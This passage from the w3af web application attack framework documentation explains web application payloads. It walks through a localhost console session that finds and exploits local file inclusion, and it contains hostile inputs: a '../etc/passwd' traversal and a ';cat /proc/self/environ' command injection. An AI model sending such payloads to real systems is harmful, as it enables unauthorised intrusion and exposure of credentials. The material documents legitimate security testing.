w3af - Web application attack and audit framework Documentation, Release 1.7.6
Until now, the exploitation of these vulnerabilities, and the steps needed to achieve access with a user of elevated
privileges had to be performed manually, which could in many situations take hours (depending on the web application
penetration tester’s skills) and may or may not achieve its objective.
Web Application Payloads are the evolution of old school system call payloads which are used in memory corruption
exploits since the 80’s. The basic problem solved by any payload is pretty simple: “I have access , what now?”. In
memory corruption exploits it’s pretty easy to perform arbitrary tasks because after successful exploitation the attacker
is able to control the remote CPU and memory, which allow for execution of arbitrary operating system calls. With
this power it’s possible to create a new user, run arbitrary commands or upload files.
In the Web Application field the situation is completely different, the intruder is restricted to the “system calls” that
the vulnerable Web Application script exposes. For example:
• Arbitrary File Read Vulnerabilities exposes read()
• OS Commanding Vulnerabilities exposes exec()
• SQL Injection Vulnerabilities exposes read(), write() and potentially exec()
Web Application Payloads are small pieces of code that are run in the intruder’s box, and then trans-
lated by the Web Application exploit to a combination of GET and POST requests to be sent to the
remote Web server. For example, a call to the emulated syscall read() with /proc/self/environ
as a parameter would generate this request when it’s run through an arbitrary file read vulnerability:
http://host.tld/read.php?file=/proc/self/environ
And this other request when exploiting an OS Commanding vulnerability
http://host.tld/os.php?cmd=;cat /proc/self/environ
1.12.2 Running Web Application Payloads
The following is a console dump from w3af scanning a vulnerable application, exploiting a vulnerability and then
running the list_processes payload:
w3af>>> plugins
w3af/plugins>>> audit lfi
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://localhost/local_file_read.php?file=section.txt
w3af/config:target>>> back
w3af>>> start
Found 1 URLs and 1 different points of injection.
The list of URLs is:
- http://localhost/local_file_read.php
The list of fuzzable requests is:
- http://localhost/local_file_read.php | Method: GET | Parameters: (file="section.txt")
Starting lfi plugin execution.
Local File Inclusion was found at: "http://localhost/local_file_read.php", using HTTP method GET.
The sent data was: "file=../../../../../../../../etc/passwd".
This vulnerability was found in the request with id 3.
Finished scanning process.
w3af>>> exploit
w3af/exploit>>> exploit local_file_reader
local_file_reader exploit plugin is starting.
- [0] <shell object (rsystem: "
*
nix")>
Please use the interact command to interact with the shell objects.
w3af/exploit>>> interact 0
Execute "end_interaction" to get out of the remote shell. Commands typed in this menu will
run through the local_file_reader shell
w3af/exploit/local_file_reader-0>>> payload list_processes
22 Chapter 1. Contents